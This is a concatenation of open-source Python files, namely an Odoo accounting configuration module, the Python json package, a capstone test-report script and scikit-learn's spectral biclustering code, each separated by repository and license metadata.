if len(fiscalyear.period_ids) == 5: # 4 periods of 3 months + opening period
period = '3months'
else:
period = 'month'
return (fiscalyear.date_start, fiscalyear.date_stop, period)
else:
past_fiscalyear_ids = self.pool.get('account.fiscalyear').search(cr, uid,
[('date_stop', '<=', time.strftime(DF)), ('company_id', '=', company_id)])
if past_fiscalyear_ids:
# use the latest fiscal, sorted by (start_date, id)
latest_year = self.pool.get('account.fiscalyear').browse(cr, uid, past_fiscalyear_ids[-1], context=context)
latest_stop = datetime.datetime.strptime(latest_year.date_stop, DF)
if len(latest_year.period_ids) == 5:
period = '3months'
else:
period = 'month'
return ((latest_stop+datetime.timedelta(days=1)).strftime(DF), latest_stop.replace(year=latest_stop.year+1).strftime(DF), period)
else:
return (time.strftime('%Y-01-01'), time.strftime('%Y-12-31'), 'month')
_defaults = {
'company_id': _default_company,
'has_default_company': _default_has_default_company,
}
def create(self, cr, uid, values, context=None):
id = super(account_config_settings, self).create(cr, uid, values, context)
# Hack: to avoid some nasty bug, related fields are not written upon record creation.
# Hence we write on those fields here.
vals = {}
for fname, field in self._columns.iteritems():
if isinstance(field, fields.related) and fname in values:
vals[fname] = values[fname]
self.write(cr, uid, [id], vals, context)
return id
def onchange_company_id(self, cr, uid, ids, company_id, context=None):
# update related fields
values = {}
values['currency_id'] = False
if company_id:
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
has_chart_of_accounts = company_id not in self.pool.get('account.installer').get_unconfigured_cmp(cr, uid)
fiscalyear_count = self.pool.get('account.fiscalyear').search_count(cr, uid,
[('date_start', '<=', time.strftime('%Y-%m-%d')), ('date_stop', '>=', time.strftime('%Y-%m-%d')),
('company_id', '=', company_id)])
date_start, date_stop, period = self._get_default_fiscalyear_data(cr, uid, company_id, context=context)
values = {
'expects_chart_of_accounts': company.expects_chart_of_accounts,
'currency_id': company.currency_id.id,
'paypal_account': company.paypal_account,
'company_footer': company.rml_footer,
'has_chart_of_accounts': has_chart_of_accounts,
'has_fiscal_year': bool(fiscalyear_count),
'chart_template_id': False,
'tax_calculation_rounding_method': company.tax_calculation_rounding_method,
'date_start': date_start,
'date_stop': date_stop,
'period': period,
}
# update journals and sequences
for journal_type in ('sale', 'sale_refund', 'purchase', 'purchase_refund'):
for suffix in ('_journal_id', '_sequence_prefix', '_sequence_next'):
values[journal_type + suffix] = False
journal_obj = self.pool.get('account.journal')
journal_ids = journal_obj.search(cr, uid, [('company_id', '=', company_id)])
for journal in journal_obj.browse(cr, uid, journal_ids):
if journal.type in ('sale', 'sale_refund', 'purchase', 'purchase_refund'):
values.update({
journal.type + '_journal_id': journal.id,
journal.type + '_sequence_prefix': journal.sequence_id.prefix,
journal.type + '_sequence_next': journal.sequence_id.number_next,
})
# update taxes
ir_values = self.pool.get('ir.values')
taxes_id = ir_values.get_default(cr, uid, 'product.template', 'taxes_id', company_id=company_id)
supplier_taxes_id = ir_values.get_default(cr, uid, 'product.template', 'supplier_taxes_id', company_id=company_id)
values.update({
'default_sale_tax': isinstance(taxes_id, list) and taxes_id[0] or taxes_id,
'default_purchase_tax': isinstance(supplier_taxes_id, list) and supplier_taxes_id[0] or supplier_taxes_id,
})
# update gain/loss exchange rate accounts
values.update({
'income_currency_exchange_account_id': company.income_currency_exchange_account_id and company.income_currency_exchange_account_id.id or False,
'expense_currency_exchange_account_id': company.expense_currency_exchange_account_id and company.expense_currency_exchange_account_id.id or False
})
return {'value': values}
def onchange_chart_template_id(self, cr, uid, ids, chart_template_id, context=None):
tax_templ_obj = self.pool.get('account.tax.template')
res = {'value': {
'complete_tax_set': False, 'sale_tax': False, 'purchase_tax': False,
'sale_tax_rate': 15, 'purchase_tax_rate': 15,
}}
if chart_template_id:
# update complete_tax_set, sale_tax and purchase_tax
chart_template = self.pool.get('account.chart.template').browse(cr, uid, chart_template_id, context=context)
res['value'].update({'complete_tax_set': chart_template.complete_tax_set})
if chart_template.complete_tax_set:
# default tax is given by the lowest sequence. For same sequence we will take the latest created as it will be the case for tax created while isntalling the generic chart of account
sale_tax_ids = tax_templ_obj.search(cr, uid,
[("chart_template_id", "=", chart_template_id), ('type_tax_use', 'in', ('sale','all'))],
order="sequence, id desc")
purchase_tax_ids = tax_templ_obj.search(cr, uid,
[("chart_template_id", "=", chart_template_id), ('type_tax_use', 'in', ('purchase','all'))],
order="sequence, id desc")
res['value']['sale_tax'] = sale_tax_ids and sale_tax_ids[0] or False
res['value']['purchase_tax'] = purchase_tax_ids and purchase_tax_ids[0] or False
if chart_template.code_digits:
res['value']['code_digits'] = chart_template.code_digits
return res
def onchange_tax_rate(self, cr, uid, ids, rate, context=None):
return {'value': {'purchase_tax_rate': rate or False}}
def onchange_multi_currency(self, cr, uid, ids, group_multi_currency, context=None):
res = {}
if not group_multi_currency:
res['value'] = {'income_currency_exchange_account_id': False, 'expense_currency_exchange_account_id': False}
return res
def onchange_start_date(self, cr, uid, id, start_date):
if start_date:
start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d")
end_date = (start_date + relativedelta(months=12)) - relativedelta(days=1)
return {'value': {'date_stop': end_date.strftime('%Y-%m-%d')}}
return {}
def open_company_form(self, cr, uid, ids, context=None):
config = self.browse(cr, uid, ids[0], context)
return {
'type': 'ir.actions.act_window',
'name': 'Configure your Company',
'res_model': 'res.company',
'res_id': config.company_id.id,
'view_mode': 'form',
}
def set_default_taxes(self, cr, uid, ids, context=None):
""" set default sale and purchase taxes for products """
if uid != SUPERUSER_ID and not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise openerp.exceptions.AccessError(_("Only administrators can change the settings"))
ir_values = self.pool.get('ir.values')
config = self.browse(cr, uid, ids[0], context)
ir_values.set_default(cr, SUPERUSER_ID, 'product.template', 'taxes_id',
config.default_sale_tax and [config.default_sale_tax.id] or False, company_id=config.company_id.id)
ir_values.set_default(cr, SUPERUSER_ID, 'product.template', 'supplier_taxes_id',
config.default_purchase_tax and [config.default_purchase_tax.id] or False, company_id=config.company_id.id)
def set_chart_of_accounts(self, cr, uid, ids, context=None):
""" install a chart of accounts for the given company (if required) """
config = self.browse(cr, uid, ids[0], context)
if config.chart_template_id:
assert config.expects_chart_of_accounts and not config.has_chart_of_accounts
wizard = self.pool.get('wizard.multi.charts.accounts')
wizard_id = wizard.create(cr, uid, {
'company_id': config.company_id.id,
'chart_template_id': config.chart_template_id.id,
'code_digits': config.code_digits or 6,
'sale_tax': config.sale_tax.id,
'purchase_tax': config.purchase_tax.id,
'sale_tax_rate': config.sale_tax_rate,
'purchase_tax_rate': config.purchase_tax_rate,
'complete_tax_set': config.complete_tax_set,
'currency_id': config.currency_id.id,
}, context)
wizard.execute(cr, uid, [wizard_id], context)
def set_fiscalyear(self, cr, uid, ids, context=None):
""" create a fiscal year for the given company (if necessary) """
config = self.browse(cr, uid, ids[0], context)
if config.has_chart_of_accounts or config.chart_template_id:
fiscalyear = self.pool.get('account.fiscalyear')
fiscalyear_count = fiscalyear.search_count(cr, uid,
[('date_start', '<=', config.date_start), ('date_stop', '>=', config.date_stop),
('company_id', '=', config.company_id.id)],
context=context)
if not fiscalyear_count:
name = code = config.date_start[:4]
if int(name) != int(config.date_stop[:4]):
name = config.date_start[:4] +'-'+ config.date_stop[:4]
code = config.date_start[2:4] +'-'+ config.date_stop[2:4]
vals = {
'name': name,
'code': code,
'date_start': config.date_start,
'date_stop': config.date_stop,
'company_id': config.company_id.id,
}
fiscalyear_id = fiscalyear.create(cr, uid, vals, context=context)
if config.period == 'month':
fiscalyear.create_period(cr, uid, [fiscalyear_id])
elif config.period == '3months':
fiscalyear.create_period3(cr, uid, [fiscalyear_id])
def get_default_dp(self, cr, uid, fields, context=None):
dp = self.pool.get('ir.model.data').get_object(cr, uid, 'product','decimal_account')
return {'decimal_precision': dp.digits}
def set_default_dp(self, cr, uid, ids, context=None):
config = self.browse(cr, uid, ids[0], context)
dp = self.pool.get('ir.model.data').get_object(cr, uid, 'product','decimal_account')
dp.write({'digits': config.decimal_precision})
def onchange_analytic_accounting(self, cr, uid, ids, analytic_accounting, context=None):
if analytic_accounting:
return {'value': {
'module_account_accountant': True,
}}
return {}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
JVenberg/PokemonGo-Bot-Desktop | pywin/Lib/json/__init__.py | 9 | 14750 | r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`json` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], sort_keys=True, separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import json
>>> print json.dumps({'4': 5, '6': 7}, sort_keys=True,
... indent=4, separators=(',', ': '))
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError(repr(o) + " is not JSON serializable")
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using json.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m json.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m json.tool
Expecting property name enclosed in double quotes: line 1 column 3 (char 2)
"""
__version__ = '2.0.9'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONEncoder',
]
__author__ = 'Bob Ippolito <bob@redivi.com>'
from .decoder import JSONDecoder
from .encoder import JSONEncoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, sort_keys=False, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is true (the default), all non-ASCII characters in the
output are escaped with ``\uXXXX`` sequences, and the result is a ``str``
instance consisting of ASCII characters only. If ``ensure_ascii`` is
``False``, some chunks written to ``fp`` may be ``unicode`` instances.
This usually happens because the input contains unicode strings or the
``encoding`` parameter is used. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter``) this is likely to
cause an error.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation. Since the default item separator is ``', '``, the
output might include trailing whitespace when ``indent`` is specified.
You can use ``separators=(',', ': ')`` to avoid this.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *sort_keys* is ``True`` (default: ``False``), then the output of
dictionaries will be sorted by key.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg; otherwise ``JSONEncoder`` is used.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not sort_keys and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, sort_keys=sort_keys, **kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, sort_keys=False, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, all non-ASCII characters are not escaped, and
the return value may be a ``unicode`` instance. See ``dump`` for details.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation. Since the default item separator is ``', '``, the
output might include trailing whitespace when ``indent`` is specified.
You can use ``separators=(',', ': ')`` to avoid this.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *sort_keys* is ``True`` (default: ``False``), then the output of
dictionaries will be sorted by key.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg; otherwise ``JSONEncoder`` is used.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not sort_keys and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
sort_keys=sort_keys, **kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None, **kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
If the contents of ``fp`` is encoded with an ASCII based encoding other
than utf-8 (e.g. latin-1), then an appropriate ``encoding`` name must
be specified. Encodings that are not ASCII based (such as UCS-2) are
not allowed, and should be wrapped with
``codecs.getreader(fp)(encoding)``, or simply decoded to a ``unicode``
object and passed to ``loads()``
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``object_pairs_hook`` is an optional function that will be called with the
result of any object literal decoded with an ordered list of pairs. The
return value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes priority.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg; otherwise ``JSONDecoder`` is used.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
**kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
If ``s`` is a ``str`` instance and is encoded with an ASCII based encoding
other than utf-8 (e.g. latin-1) then an appropriate ``encoding`` name
must be specified. Encodings that are not ASCII based (such as UCS-2)
are not allowed and should be decoded to ``unicode`` first.
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``object_pairs_hook`` is an optional function that will be called with the
result of any object literal decoded with an ordered list of pairs. The
return value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes priority.
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN, null, true, false.
This can be used to raise an exception if invalid JSON numbers
are encountered.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg; otherwise ``JSONDecoder`` is used.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
return cls(encoding=encoding, **kw).decode(s)
| mit |
AmesianX/capstone | suite/cstest/cstest_report.py | 7 | 2718 | #!/usr/bin/python
import re
import sys
import getopt
from subprocess import Popen, PIPE
from pprint import pprint as ppr
import os
def Usage(s):
print 'Usage: {} -t <cstest_path> [-f <file_name.cs>] [-d <directory>]'.format(s)
sys.exit(-1)
def get_report_file(toolpath, filepath, getDetails, cmt_out):
cmd = [toolpath, '-f', filepath]
process = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
# stdout
failed_tests = []
# print '---> stdout\n', stdout
# print '---> stderr\n', stderr
matches = re.finditer(r'\[\s+RUN\s+\]\s+(.*)\n\[\s+FAILED\s+\]', stdout)
for match in matches:
failed_tests.append(match.group(1))
# stderr
counter = 0
details = []
for line in stderr.split('\n'):
if '[ PASSED ] 0 test(s).' in line:
break
elif 'LINE' in line:
continue
elif 'ERROR' in line and ' --- ' in line:
parts = line.split(' --- ')
try:
details.append((parts[1], failed_tests[counter], parts[2]))
except IndexError:
details.append(('', 'Unknown test', line.split(' --- ')[1]))
counter += 1
else:
continue
print '\n[-] There are/is {} failed test(s)'.format(len(details))
if len(details) > 0 and getDetails:
print '[-] Detailed report for {}:\n'.format(filepath)
for c, f, d in details:
print '\t[+] {}: {}\n\t\t{}\n'.format(f, c, d)
print '\n'
return 0
elif len(details) > 0:
for c, f, d in details:
if len(f) > 0 and cmt_out is True:
tmp_cmd = ['sed', '-E', '-i.bak', 's/({})(.*)/\/\/ \\1\\2/g'.format(c), filepath]
sed_proc = Popen(tmp_cmd, stdout=PIPE, stderr=PIPE)
sed_proc.communicate()
tmp_cmd2 = ['rm', '-f', filepath + '.bak']
rm_proc = Popen(tmp_cmd2, stdout=PIPE, stderr=PIPE)
rm_proc.communicate()
return 0;
return 1
def get_report_folder(toolpath, folderpath, details, cmt_out):
result = 1
for root, dirs, files in os.walk(folderpath):
path = root.split(os.sep)
for f in files:
if f.split('.')[-1] == 'cs':
print '[-] Target:', f,
result *= get_report_file(toolpath, os.sep.join(x for x in path) + os.sep + f, details, cmt_out)
sys.exit(result ^ 1)
if __name__ == '__main__':
Done = False
details = False
toolpath = ''
cmt_out = False
try:
opts, args = getopt.getopt(sys.argv[1:], "ct:f:d:D")
for opt, arg in opts:
if opt == '-f':
result = get_report_file(toolpath, arg, details, cmt_out)
if result == 0:
sys.exit(1)
Done = True
elif opt == '-d':
get_report_folder(toolpath, arg, details, cmt_out)
Done = True
elif opt == '-t':
toolpath = arg
elif opt == '-D':
details = True
elif opt == '-c':
cmt_out = True
except getopt.GetoptError:
Usage(sys.argv[0])
if Done is False:
Usage(sys.argv[0])
| bsd-3-clause |
joshloyal/scikit-learn | sklearn/cluster/bicluster.py | 26 | 19870 | """Spectral biclustering algorithms.
Authors : Kemal Eren
License: BSD 3 clause
"""
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import dia_matrix
from scipy.sparse import issparse
from . import KMeans, MiniBatchKMeans
from ..base import BaseEstimator, BiclusterMixin
from ..externals import six
from ..utils import check_random_state
from ..utils.arpack import eigsh, svds
from ..utils.extmath import (make_nonnegative, norm, randomized_svd,
safe_sparse_dot)
from ..utils.validation import assert_all_finite, check_array
__all__ = ['SpectralCoclustering',
'SpectralBiclustering']
def _scale_normalize(X):
"""Normalize ``X`` by scaling rows and columns independently.
Returns the normalized matrix and the row and column scaling
factors.
"""
X = make_nonnegative(X)
row_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=1))).squeeze()
col_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=0))).squeeze()
row_diag = np.where(np.isnan(row_diag), 0, row_diag)
col_diag = np.where(np.isnan(col_diag), 0, col_diag)
if issparse(X):
n_rows, n_cols = X.shape
r = dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
an = r * X * c
else:
an = row_diag[:, np.newaxis] * X * col_diag
return an, row_diag, col_diag
def _bistochastic_normalize(X, max_iter=1000, tol=1e-5):
"""Normalize rows and columns of ``X`` simultaneously so that all
rows sum to one constant and all columns sum to a different
constant.
"""
# According to paper, this can also be done more efficiently with
# deviation reduction and balancing algorithms.
X = make_nonnegative(X)
X_scaled = X
dist = None
for _ in range(max_iter):
X_new, _, _ = _scale_normalize(X_scaled)
if issparse(X):
dist = norm(X_scaled.data - X.data)
else:
dist = norm(X_scaled - X_new)
X_scaled = X_new
if dist is not None and dist < tol:
break
return X_scaled
def _log_normalize(X):
"""Normalize ``X`` according to Kluger's log-interactions scheme."""
X = make_nonnegative(X, min_value=1)
if issparse(X):
raise ValueError("Cannot compute log of a sparse matrix,"
" because log(x) diverges to -infinity as x"
" goes to 0.")
L = np.log(X)
row_avg = L.mean(axis=1)[:, np.newaxis]
col_avg = L.mean(axis=0)
avg = L.mean()
return L - row_avg - col_avg + avg
class BaseSpectral(six.with_metaclass(ABCMeta, BaseEstimator,
BiclusterMixin)):
"""Base class for spectral biclustering."""
@abstractmethod
def __init__(self, n_clusters=3, svd_method="randomized",
n_svd_vecs=None, mini_batch=False, init="k-means++",
n_init=10, n_jobs=1, random_state=None):
self.n_clusters = n_clusters
self.svd_method = svd_method
self.n_svd_vecs = n_svd_vecs
self.mini_batch = mini_batch
self.init = init
self.n_init = n_init
self.n_jobs = n_jobs
self.random_state = random_state
def _check_parameters(self):
legal_svd_methods = ('randomized', 'arpack')
if self.svd_method not in legal_svd_methods:
raise ValueError("Unknown SVD method: '{0}'. svd_method must be"
" one of {1}.".format(self.svd_method,
legal_svd_methods))
def fit(self, X):
"""Creates a biclustering for X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
self._check_parameters()
self._fit(X)
return self
def _svd(self, array, n_components, n_discard):
"""Returns first `n_components` left and right singular
vectors u and v, discarding the first `n_discard`.
"""
if self.svd_method == 'randomized':
kwargs = {}
if self.n_svd_vecs is not None:
kwargs['n_oversamples'] = self.n_svd_vecs
u, _, vt = randomized_svd(array, n_components,
random_state=self.random_state,
**kwargs)
elif self.svd_method == 'arpack':
u, _, vt = svds(array, k=n_components, ncv=self.n_svd_vecs)
if np.any(np.isnan(vt)):
# some eigenvalues of A * A.T are negative, causing
# sqrt() to be np.nan. This causes some vectors in vt
# to be np.nan.
A = safe_sparse_dot(array.T, array)
random_state = check_random_state(self.random_state)
# initialize with [-1,1] as in ARPACK
v0 = random_state.uniform(-1, 1, A.shape[0])
_, v = eigsh(A, ncv=self.n_svd_vecs, v0=v0)
vt = v.T
if np.any(np.isnan(u)):
A = safe_sparse_dot(array, array.T)
random_state = check_random_state(self.random_state)
# initialize with [-1,1] as in ARPACK
v0 = random_state.uniform(-1, 1, A.shape[0])
_, u = eigsh(A, ncv=self.n_svd_vecs, v0=v0)
assert_all_finite(u)
assert_all_finite(vt)
u = u[:, n_discard:]
vt = vt[n_discard:]
return u, vt.T
def _k_means(self, data, n_clusters):
if self.mini_batch:
model = MiniBatchKMeans(n_clusters,
init=self.init,
n_init=self.n_init,
random_state=self.random_state)
else:
model = KMeans(n_clusters, init=self.init,
n_init=self.n_init, n_jobs=self.n_jobs,
random_state=self.random_state)
model.fit(data)
centroid = model.cluster_centers_
labels = model.labels_
return centroid, labels
class SpectralCoclustering(BaseSpectral):
"""Spectral Co-Clustering algorithm (Dhillon, 2001).
Clusters rows and columns of an array `X` to solve the relaxed
normalized cut of the bipartite graph created from `X` as follows:
the edge between row vertex `i` and column vertex `j` has weight
`X[i, j]`.
The resulting bicluster structure is block-diagonal, since each
row and each column belongs to exactly one bicluster.
Supports sparse matrices, as long as they are nonnegative.
Read more in the :ref:`User Guide <spectral_coclustering>`.
Parameters
----------
n_clusters : integer, optional, default: 3
The number of biclusters to find.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', use
:func:`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', use
:func:`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
rows_ : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
columns_ : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
row_labels_ : array-like, shape (n_rows,)
The bicluster label of each row.
column_labels_ : array-like, shape (n_cols,)
The bicluster label of each column.
References
----------
* Dhillon, Inderjit S, 2001. `Co-clustering documents and words using
bipartite spectral graph partitioning
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.140.3011>`__.
"""
def __init__(self, n_clusters=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralCoclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
def _fit(self, X):
normalized_data, row_diag, col_diag = _scale_normalize(X)
n_sv = 1 + int(np.ceil(np.log2(self.n_clusters)))
u, v = self._svd(normalized_data, n_sv, n_discard=1)
z = np.vstack((row_diag[:, np.newaxis] * u,
col_diag[:, np.newaxis] * v))
_, labels = self._k_means(z, self.n_clusters)
n_rows = X.shape[0]
self.row_labels_ = labels[:n_rows]
self.column_labels_ = labels[n_rows:]
self.rows_ = np.vstack(self.row_labels_ == c
for c in range(self.n_clusters))
